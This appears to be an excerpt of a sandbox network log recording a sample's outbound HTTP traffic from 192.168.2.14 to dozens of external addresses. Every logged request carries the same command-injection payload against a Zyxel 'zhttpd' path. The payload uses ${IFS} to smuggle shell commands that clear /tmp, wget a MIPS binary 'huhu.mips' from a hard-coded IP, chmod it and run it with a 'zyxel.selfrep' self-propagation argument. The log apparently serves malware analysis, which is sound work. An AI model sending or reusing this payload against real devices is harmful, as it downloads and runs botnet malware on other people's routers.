                                                        Feb 2, 2024 06:20:54.629934072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.1443530198.80.16.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629968882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.1452348209.127.205.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630012989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.1442302175.32.207.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630042076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.1459266178.121.66.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630085945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.1459772148.27.228.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630110979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.1445190191.180.120.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630142927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.1458552136.126.48.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630172014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.1440150213.250.36.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630207062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.145512447.136.83.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630255938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.1459598181.54.148.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630285025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.145111227.132.234.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630342007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.145110444.204.93.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630412102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.144778065.61.8.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630431890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.1439778154.2.222.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630456924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.1447082195.23.24.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630496025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.144603848.205.131.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630546093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.1446378100.210.60.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630572081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.1438732195.65.130.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630616903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.143464883.133.65.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630641937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.1450304182.122.196.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630681992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.1438506210.233.207.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630705118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.144265277.87.227.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630737066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.143442650.109.16.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630798101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.1453618106.132.224.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630830050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.1450236196.59.87.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630872965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.1433996102.52.186.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630897999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.145888653.5.162.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630958080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.143801065.40.43.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.630996943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.144288635.19.1.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631042004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.145567272.2.74.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631072998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.143342880.200.9.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631103992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.14597165.1.77.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631125927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.145872448.242.226.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631170988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.1446276103.142.205.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631221056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.14571342.55.156.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631269932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.144360220.96.32.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631310940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.1450454134.133.245.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631366014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.1439020173.89.254.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631386042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.1448424170.4.196.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631439924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.145346495.132.229.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631474972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.145805665.243.182.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631531954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.1456578209.191.147.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631560087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.143462693.83.70.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631591082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.1436794191.254.37.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631638050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.144646052.145.210.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631669998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.1456678195.174.220.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631722927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.1450750168.45.124.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631782055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.1459016202.215.198.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631797075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.14573389.32.183.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631824970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        690192.168.2.1444086162.224.2.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631889105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.1452770105.159.136.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631910086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.1452722217.138.248.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631956100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.145046299.58.243.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.631994009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.143374485.99.78.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632011890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.1448206162.244.172.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632041931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.143368889.122.174.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632076979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.143577291.6.185.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632116079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.144636854.197.205.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632164955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.145389074.7.26.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632193089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.143285020.146.98.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632246971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.145614212.39.150.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632282972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.144415478.164.40.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632320881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.145655466.86.24.76443
                                                        TimestampBytes transferredDirectionData
